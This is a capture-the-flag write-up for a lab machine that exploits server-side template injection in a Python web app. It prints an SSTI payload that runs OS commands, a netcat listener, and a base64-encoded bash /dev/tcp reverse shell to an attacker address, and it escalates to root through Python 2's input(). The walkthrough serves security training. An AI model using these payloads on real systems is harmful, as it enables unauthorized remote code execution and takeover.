Post

Tufan Al-Aqsa Machine Write up

Posted
By Ahmad Alawneh 2 min read

Tufan Al-Aqsa

Untitled

IP: 10.0.0.133

Enumeration

We start by scanning the machine with nmap.

Discover all open ports:

Untitled

Check what is exactly running on these ports:

Untitled

Foothold

There is python web application running on port 80.

Visiting it we get:

Untitled

If we try to inspect the source code, surprisingly we cant!

Trying to check robots.txt file

Untitled

We get this error page, and we notice that the file name is displayed in the error message.

Since it is a python web server it may be vulnerable to SSTI.

So to check we try the famous {{7* 7}} SSTI payload.

Untitled

As we can see it returned 49 which proves that it is vulnerable.

So we now try to find a payload that can lead to RCE and then get a reverse shell.

1

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

Untitled

We have successfully run id command.

For reverse shell:

First we set up a listener:

1

nc -nvlp 1234

Untitled

Then we get a reverse shell payload: (you can use https://www.revshells.com/ to generate one)

1

/bin/bash -i >& /dev/tcp/10.0.0.132/1234 0>&1

Encode it with bsae64

1

echo '/bin/bash -i >& /dev/tcp/10.0.0.132/1234 0>&1' | base64

Untitled

1

L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xMzIvMTIzNCAwPiYxCg==

This will echo the command, decode it and run it. This way we wont face any problems running commands.

1

http://10.0.0.133/{{request.application.__globals__.__builtins__.__import__('os').popen('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xMzIvMTIzNCAwPiYxCg== | base64 -d | bash').read()}}

And we get the reverse shell

Untitled

We can find the user.txt flag inside the home directory for the user zoznoor23. 🇵🇸

Untitled

Privilege Escalation

Running sudo -l to check what the user zoznoor23 can run using sudo.

Untitled

So the user zoznoor23 can run python2 on /opt/i_dont_trust_sudo.py as root. Let us try running it:

Untitled

It asks for a password, but we do not have any.

Let us read the file to understand how it works, or to get a clue about what the password is.

Untitled

So bsically the code reads a password form /root/password.txt, and check if our input matches the password, then it will run /bin/bash giving us a shell as root.

Since we did not found any clue, we should look somewhere else.

What is interesting here is that it is using python 2, whihle python3 exists on the machine which is weried.

Searching for python 2 vulnerabilities we find that the input() function in python2 is vulnerable.

The vulnerability in input() method lies in the fact that the variable accessing the value of input can be accessed by anyone just by using the name of the variable or method. Below are some vulnerability in input() method:

  • Variable name as input parameter
  • Function name as parameter

Read about the vulnerability.

So in our case we just need to provide secure_password as our input, and we now we got a shell as root.

Untitled

Now we can go to the home directory for the root user and read root.txt flag.

Untitled

Write-ups, MachinesCTF
CTF Pentesting
This post is licensed under CC BY 4.0 by the author.